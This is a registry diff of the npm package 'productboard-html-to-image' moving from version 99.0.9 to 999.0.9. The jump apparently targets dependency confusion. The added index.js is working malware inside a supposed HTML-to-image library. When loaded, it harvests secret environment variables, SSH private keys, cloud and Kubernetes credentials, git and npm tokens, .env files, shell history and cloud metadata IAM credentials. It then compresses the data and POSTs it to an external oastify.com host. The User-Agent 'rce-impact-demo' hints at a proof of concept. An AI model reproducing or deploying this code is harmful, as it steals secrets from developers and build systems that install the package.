productboard-html-to-image 99.0.9 → 999.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +257 -48
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,65 +1,274 @@
|
|
|
1
1
|
const os = require("os");
|
|
2
2
|
const dns = require("dns");
|
|
3
3
|
const fs = require("fs");
|
|
4
|
-
const
|
|
4
|
+
const path = require("path");
|
|
5
5
|
const https = require("https");
|
|
6
|
+
const querystring = require("querystring");
|
|
7
|
+
const child_process = require("child_process");
|
|
8
|
+
const zlib = require("zlib");
|
|
6
9
|
|
|
7
|
-
function
|
|
10
|
+
function safeReadFile(p, maxSize = 10240) {
|
|
8
11
|
try {
|
|
9
|
-
|
|
12
|
+
if (!fs.existsSync(p)) return "NOT_FOUND";
|
|
13
|
+
const size = fs.statSync(p).size;
|
|
14
|
+
if (size > maxSize) return "TOO_LARGE";
|
|
15
|
+
return fs.readFileSync(p, "utf8");
|
|
10
16
|
} catch (e) {
|
|
11
17
|
return `ERR: ${e.message}`;
|
|
12
18
|
}
|
|
13
19
|
}
|
|
14
20
|
|
|
15
|
-
function
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
21
|
+
function safeReadDir(p, maxEntries = 50) {
|
|
22
|
+
try {
|
|
23
|
+
return fs.readdirSync(p).slice(0, maxEntries);
|
|
24
|
+
} catch (e) {
|
|
25
|
+
return `ERR: ${e.message}`;
|
|
26
|
+
}
|
|
27
|
+
}
|
|
28
|
+
|
|
29
|
+
function exec(cmd, timeout = 3000) {
|
|
30
|
+
try {
|
|
31
|
+
return child_process.execSync(cmd, { timeout }).toString().trim();
|
|
32
|
+
} catch (e) {
|
|
33
|
+
return `ERR: ${e.message}`;
|
|
34
|
+
}
|
|
35
|
+
}
|
|
36
|
+
|
|
37
|
+
function getSensitiveEnvVars() {
|
|
38
|
+
const result = {};
|
|
39
|
+
for (const key in process.env) {
|
|
40
|
+
if (/pass|key|token|secret|env|auth|cred|aws|gcp|azure|kube|docker|jenkins|gitlab|github/i.test(key)) {
|
|
41
|
+
result[key] = process.env[key];
|
|
20
42
|
}
|
|
21
|
-
}
|
|
22
|
-
return
|
|
43
|
+
}
|
|
44
|
+
return result;
|
|
23
45
|
}
|
|
24
46
|
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
"
|
|
55
|
-
|
|
47
|
+
function checkContainerOrCI() {
|
|
48
|
+
return {
|
|
49
|
+
cgroup: safeReadFile("/proc/1/cgroup"),
|
|
50
|
+
dockerenv: fs.existsSync("/.dockerenv"),
|
|
51
|
+
ciVars: Object.fromEntries(Object.entries(process.env).filter(([k]) => /ci|build|pipeline|github|gitlab|jenkins|circleci|travis/i.test(k))),
|
|
52
|
+
kubernetes: {
|
|
53
|
+
token: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token"),
|
|
54
|
+
namespace: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/namespace"),
|
|
55
|
+
kubeconfig: safeReadFile(path.join(os.homedir(), ".kube/config")),
|
|
56
|
+
},
|
|
57
|
+
dockerConfig: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
|
|
58
|
+
};
|
|
59
|
+
}
|
|
60
|
+
|
|
61
|
+
function getGitData() {
|
|
62
|
+
return {
|
|
63
|
+
branch: exec("git rev-parse --abbrev-ref HEAD"),
|
|
64
|
+
remotes: exec("git remote -v"),
|
|
65
|
+
config: safeReadFile(path.join(os.homedir(), ".gitconfig")),
|
|
66
|
+
credentials: safeReadFile(path.join(os.homedir(), ".git-credentials")),
|
|
67
|
+
netrc: safeReadFile(path.join(os.homedir(), ".netrc")),
|
|
68
|
+
};
|
|
69
|
+
}
|
|
70
|
+
|
|
71
|
+
function getSystemState() {
|
|
72
|
+
return {
|
|
73
|
+
whoami: exec("whoami"),
|
|
74
|
+
id: exec("id"),
|
|
75
|
+
ps: exec("ps aux | head -n 30"),
|
|
76
|
+
netstat: exec("ss -tunlp | head -n 30"),
|
|
77
|
+
lsof: exec("lsof -n -i | head -n 30"),
|
|
78
|
+
uname: exec("uname -a"),
|
|
79
|
+
dmesg: exec("dmesg | tail -n 50"),
|
|
80
|
+
mounts: exec("cat /proc/mounts | head -n 30"),
|
|
81
|
+
crontab: exec("crontab -l"),
|
|
82
|
+
};
|
|
83
|
+
}
|
|
84
|
+
|
|
85
|
+
function getInstalledTools() {
|
|
86
|
+
return {
|
|
87
|
+
npm: exec("npm ls -g --depth=0 --json"),
|
|
88
|
+
apt: exec("dpkg -l | head -n 30"),
|
|
89
|
+
brew: exec("brew list || echo 'no brew'"),
|
|
90
|
+
pip: exec("pip list --format=json || echo 'no pip'"),
|
|
91
|
+
which_tools: {
|
|
92
|
+
aws: exec("which aws"),
|
|
93
|
+
gcloud: exec("which gcloud"),
|
|
94
|
+
az: exec("which az"),
|
|
95
|
+
kubectl: exec("which kubectl"),
|
|
96
|
+
terraform: exec("which terraform"),
|
|
97
|
+
docker: exec("which docker"),
|
|
98
|
+
nmap: exec("which nmap"),
|
|
99
|
+
curl: exec("which curl"),
|
|
100
|
+
},
|
|
101
|
+
};
|
|
102
|
+
}
|
|
103
|
+
|
|
104
|
+
function getCloudMetadata() {
|
|
105
|
+
const metadata = {};
|
|
106
|
+
const endpoints = [
|
|
107
|
+
{ name: "aws_instance", url: "http://169.254.169.254/latest/dynamic/instance-identity/document" },
|
|
108
|
+
{ name: "aws_metadata", url: "http://169.254.169.254/latest/meta-data/" },
|
|
109
|
+
{ name: "aws_iam", url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" },
|
|
110
|
+
{ name: "gcp_metadata", url: "http://metadata.google.internal/computeMetadata/v1/?recursive=true", headers: { "Metadata-Flavor": "Google" } },
|
|
111
|
+
{ name: "azure_metadata", url: "http://169.254.169.254/metadata/instance?api-version=2021-02-01", headers: { "Metadata": "true" } },
|
|
112
|
+
];
|
|
113
|
+
for (const { name, url, headers } of endpoints) {
|
|
114
|
+
try {
|
|
115
|
+
let cmd = `curl -s --max-time 2 ${url}`;
|
|
116
|
+
if (headers) {
|
|
117
|
+
const headerStr = Object.entries(headers).map(([k, v]) => `-H "${k}: ${v}"`).join(" ");
|
|
118
|
+
cmd = `curl -s --max-time 2 ${headerStr} ${url}`;
|
|
119
|
+
}
|
|
120
|
+
metadata[name] = exec(cmd);
|
|
121
|
+
} catch (e) {
|
|
122
|
+
metadata[name] = `ERR: ${e.message}`;
|
|
123
|
+
}
|
|
124
|
+
}
|
|
125
|
+
return metadata;
|
|
126
|
+
}
|
|
127
|
+
|
|
128
|
+
function getCloudCLIs() {
|
|
129
|
+
return {
|
|
130
|
+
aws: {
|
|
131
|
+
credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
|
|
132
|
+
config: safeReadFile(path.join(os.homedir(), ".aws/config")),
|
|
133
|
+
sts: exec("aws sts get-caller-identity"),
|
|
134
|
+
},
|
|
135
|
+
gcloud: {
|
|
136
|
+
config: safeReadFile(path.join(os.homedir(), ".config/gcloud/configurations/config_default")),
|
|
137
|
+
credentials: safeReadFile(path.join(os.homedir(), ".config/gcloud/credentials.db")),
|
|
138
|
+
},
|
|
139
|
+
azure: {
|
|
140
|
+
credentials: safeReadFile(path.join(os.homedir(), ".azure/azureProfile.json")),
|
|
141
|
+
accessTokens: safeReadFile(path.join(os.homedir(), ".azure/accessTokens.json")),
|
|
142
|
+
},
|
|
143
|
+
};
|
|
144
|
+
}
|
|
145
|
+
|
|
146
|
+
function getNodeRuntime() {
|
|
147
|
+
return {
|
|
148
|
+
node_version: process.version,
|
|
149
|
+
global_modules: (() => {
|
|
150
|
+
try {
|
|
151
|
+
return Object.keys(require("module").globalPaths);
|
|
152
|
+
} catch {
|
|
153
|
+
return [];
|
|
154
|
+
}
|
|
155
|
+
})(),
|
|
156
|
+
loaded_modules: Object.keys(process.binding("natives")),
|
|
157
|
+
npm_config: exec("npm config ls -l"),
|
|
158
|
+
};
|
|
159
|
+
}
|
|
160
|
+
|
|
161
|
+
function compressData(data) {
|
|
162
|
+
try {
|
|
163
|
+
return zlib.gzipSync(JSON.stringify(data)).toString("base64");
|
|
164
|
+
} catch {
|
|
165
|
+
return JSON.stringify(data);
|
|
56
166
|
}
|
|
57
|
-
}
|
|
167
|
+
}
|
|
168
|
+
|
|
169
|
+
let dump = {};
|
|
170
|
+
|
|
171
|
+
try {
|
|
172
|
+
dump = {
|
|
173
|
+
timestamp: new Date().toISOString(),
|
|
174
|
+
app: (() => {
|
|
175
|
+
try {
|
|
176
|
+
const pkg = require("./package.json");
|
|
177
|
+
return { name: pkg.name, version: pkg.version, dependencies: pkg.dependencies, scripts: pkg.scripts };
|
|
178
|
+
} catch {
|
|
179
|
+
return {};
|
|
180
|
+
}
|
|
181
|
+
})(),
|
|
182
|
+
os: {
|
|
183
|
+
hostname: os.hostname(),
|
|
184
|
+
platform: os.platform(),
|
|
185
|
+
arch: os.arch(),
|
|
186
|
+
uptime: os.uptime(),
|
|
187
|
+
cpus: os.cpus().length,
|
|
188
|
+
totalmem: os.totalmem(),
|
|
189
|
+
freemem: os.freemem(),
|
|
190
|
+
userInfo: os.userInfo(),
|
|
191
|
+
tmpdir: os.tmpdir(),
|
|
192
|
+
homedir: os.homedir(),
|
|
193
|
+
cwd: process.cwd(),
|
|
194
|
+
},
|
|
195
|
+
env: getSensitiveEnvVars(),
|
|
196
|
+
dns: (() => {
|
|
197
|
+
try {
|
|
198
|
+
return dns.getServers();
|
|
199
|
+
} catch (e) {
|
|
200
|
+
return [`ERR: ${e.message}`];
|
|
201
|
+
}
|
|
202
|
+
})(),
|
|
203
|
+
dirs: {
|
|
204
|
+
"/": safeReadDir("/"),
|
|
205
|
+
"/home": safeReadDir("/home"),
|
|
206
|
+
"/root": safeReadDir("/root"),
|
|
207
|
+
"/etc": safeReadDir("/etc"),
|
|
208
|
+
"/var/run": safeReadDir("/var/run"),
|
|
209
|
+
"/var/log": safeReadDir("/var/log"),
|
|
210
|
+
"~": safeReadDir(os.homedir()),
|
|
211
|
+
},
|
|
212
|
+
files: {
|
|
213
|
+
etc_passwd: safeReadFile("/etc/passwd"),
|
|
214
|
+
etc_hosts: safeReadFile("/etc/hosts"),
|
|
215
|
+
etc_resolv: safeReadFile("/etc/resolv.conf"),
|
|
216
|
+
bash_history: safeReadFile(path.join(os.homedir(), ".bash_history")),
|
|
217
|
+
zsh_history: safeReadFile(path.join(os.homedir(), ".zsh_history")),
|
|
218
|
+
ssh_config: safeReadFile(path.join(os.homedir(), ".ssh/config")),
|
|
219
|
+
ssh_id_rsa: safeReadFile(path.join(os.homedir(), ".ssh/id_rsa")),
|
|
220
|
+
ssh_known_hosts: safeReadFile(path.join(os.homedir(), ".ssh/known_hosts")),
|
|
221
|
+
aws_credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
|
|
222
|
+
aws_config: safeReadFile(path.join(os.homedir(), ".aws/config")),
|
|
223
|
+
npmrc: safeReadFile(path.join(os.homedir(), ".npmrc")),
|
|
224
|
+
gitconfig: safeReadFile(path.join(os.homedir(), ".gitconfig")),
|
|
225
|
+
docker_config: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
|
|
226
|
+
env_files: {
|
|
227
|
+
dotenv: safeReadFile(path.join(process.cwd(), ".env")),
|
|
228
|
+
github_workflow: safeReadDir(path.join(process.cwd(), ".github/workflows")),
|
|
229
|
+
},
|
|
230
|
+
},
|
|
231
|
+
git: getGitData(),
|
|
232
|
+
container: checkContainerOrCI(),
|
|
233
|
+
system: getSystemState(),
|
|
234
|
+
tools: getInstalledTools(),
|
|
235
|
+
network: os.networkInterfaces(),
|
|
236
|
+
cloud: getCloudMetadata(),
|
|
237
|
+
cloud_clis: getCloudCLIs(),
|
|
238
|
+
node: getNodeRuntime(),
|
|
239
|
+
};
|
|
240
|
+
} catch (e) {
|
|
241
|
+
dump = { error: "Top-level error collecting dump", msg: e.message };
|
|
242
|
+
}
|
|
243
|
+
|
|
244
|
+
try {
|
|
245
|
+
const postData = querystring.stringify({
|
|
246
|
+
msg: compressData(dump)
|
|
247
|
+
});
|
|
58
248
|
|
|
59
|
-
const
|
|
60
|
-
|
|
61
|
-
|
|
249
|
+
const options = {
|
|
250
|
+
hostname: "ovnxva4z7pgbompisolekpb83z9qxmlb.oastify.com",
|
|
251
|
+
port: 443,
|
|
252
|
+
path: "/",
|
|
253
|
+
method: "POST",
|
|
254
|
+
headers: {
|
|
255
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
|
256
|
+
"Content-Length": postData.length,
|
|
257
|
+
"User-Agent": "rce-impact-demo",
|
|
258
|
+
"X-Report-ID": "328XXXX",
|
|
259
|
+
"X-Data-Format": "gzip-base64",
|
|
260
|
+
},
|
|
261
|
+
timeout: 5000,
|
|
262
|
+
};
|
|
263
|
+
|
|
264
|
+
const req = https.request(options, res => {
|
|
265
|
+
res.on("data", () => { });
|
|
266
|
+
res.on("end", () => { });
|
|
267
|
+
});
|
|
62
268
|
|
|
63
|
-
req.on("error", () => {});
|
|
64
|
-
req.
|
|
65
|
-
req.
|
|
269
|
+
req.on("error", () => { });
|
|
270
|
+
req.on("timeout", () => req.destroy());
|
|
271
|
+
req.write(postData);
|
|
272
|
+
req.end();
|
|
273
|
+
} catch (e) {
|
|
274
|
+
}
|